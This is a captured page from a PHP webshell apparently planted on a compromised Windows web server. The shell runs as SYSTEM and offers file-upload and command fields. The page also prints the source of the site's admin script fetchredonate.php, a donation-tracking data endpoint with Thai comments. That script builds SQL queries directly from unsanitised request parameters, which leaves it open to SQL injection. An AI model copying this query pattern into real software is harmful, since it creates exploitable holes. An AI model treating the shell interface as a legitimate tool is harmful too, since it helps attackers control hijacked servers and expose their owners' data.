403Webshell
Server IP : 172.67.187.206  /  Your IP : 162.159.115.42
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/csr/admin/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/news/csr/admin/pages/fetchredonate.php
<?php
/* Database connection start */
require_once "../../include/config.php";
// ตารางข้อมูล
$SQLb = $mysqli->query("SELECT * FROM setting_year WHERE `y_id` ='1'");
$Rowb = mysqli_fetch_array($SQLb);
$year=$Rowb['set_year'];

$table = "log_area"; 
$requestData= $_REQUEST;

$columns = array( 
// column ของตารางในฐานข้อมูล
	0 =>'aid',
	1 =>'username', 
	2 => 'fullname'
	
);

if( !empty($requestData['search']['value']) ) {
	//ค้นหาฟิลด์  title , views
	$query = $mysqli->query("SELECT * FROM $table WHERE 1=1 AND username LIKE '%".$requestData['search']['value']."%' OR fullname LIKE '%".$requestData['search']['value']."%' ORDER BY ". $columns[$requestData['order'][0]['column']]." ".$requestData['order'][0]['dir']." LIMIT ".$requestData['start']." ,".$requestData['length']."");
	$totalData=mysqli_num_rows($query);
	$sqls= $mysqli->query("SELECT * FROM $table ");
	$totalAll=mysqli_num_rows($sqls);	
	$totalFiltered = $totalAll; 	
}else{
//แสดงข้อมูลปกติ
	$query = $mysqli->query("SELECT * FROM $table ORDER BY ". $columns[$requestData['order'][0]['column']]." ".$requestData['order'][0]['dir']." LIMIT ".$requestData['start']." ,".$requestData['length']."");
	$totalData=mysqli_num_rows($query);
	$sqls= $mysqli->query("SELECT * FROM $table ");
	$totalAll=mysqli_num_rows($sqls);
	$totalFiltered = $totalAll;  
}

$data = array();
$i=1+$requestData['start'];
while( $row=mysqli_fetch_array($query) ) {  // preparing an array
	$nestedData=array(); 

	$nestedData[] = '<center>'.number_format($i).'</center>';
	$nestedData[] = '<center>'.$row["username"].'</center>';
	$nestedData[] = '&nbsp;'.$row["fullname"].'';
$sqlo1= $mysqli->query("SELECT * FROM tb_requirements WHERE rcode='$row[username]' AND year='$year' AND `r_donate` IS NULL");
$T1=mysqli_num_rows($sqlo1);	
	$nestedData[] = '<center>'.$T1.'</center>';
$sqlo2= $mysqli->query("SELECT * FROM tb_donated WHERE u_scid='$row[username]' AND u_year='$year' AND u_del='0'");
$T2=mysqli_num_rows($sqlo2);	
	$nestedData[] = '<center>'.$T2.'</center>';
$sqlo3= $mysqli->query("SELECT * FROM `tb_requirements` INNER JOIN `log_school` ON `tb_requirements`.`rcode` = `log_school`.`username` WHERE areacode='$row[username]' AND year='$year' AND `r_donate` IS NULL ");
$T3=mysqli_num_rows($sqlo3);	
	$nestedData[] = '<center>'.$T3.'</center>';	
	
$sqlo4= $mysqli->query("SELECT * FROM `log_school` INNER JOIN `tb_donated` ON `log_school`.`username` = `tb_donated`.`u_scid` WHERE `areacode`='$row[username]' AND `u_year`='$year' ");
$T4=mysqli_num_rows($sqlo4);	
	$nestedData[] = '<center>'.$T4.'</center>';	
$SQLT= $mysqli->query("SELECT * FROM log_school WHERE `areacode`='$row[username]' ");
$ATOTAL=mysqli_num_rows($SQLT);	
	$nestedData[] = '<center>'.$ATOTAL.'</center>';
	$data[] = $nestedData;
	$i++;
}



$json_data = array(
			"draw"            => intval( $requestData['draw'] ),
			"recordsTotal"    => intval( $totalData ),
			"recordsFiltered" => intval( $totalFiltered ),
			"data"            => $data 
			);

echo json_encode($json_data);

?>

Youez - 2016 - github.com/yon3zu
LinuXploit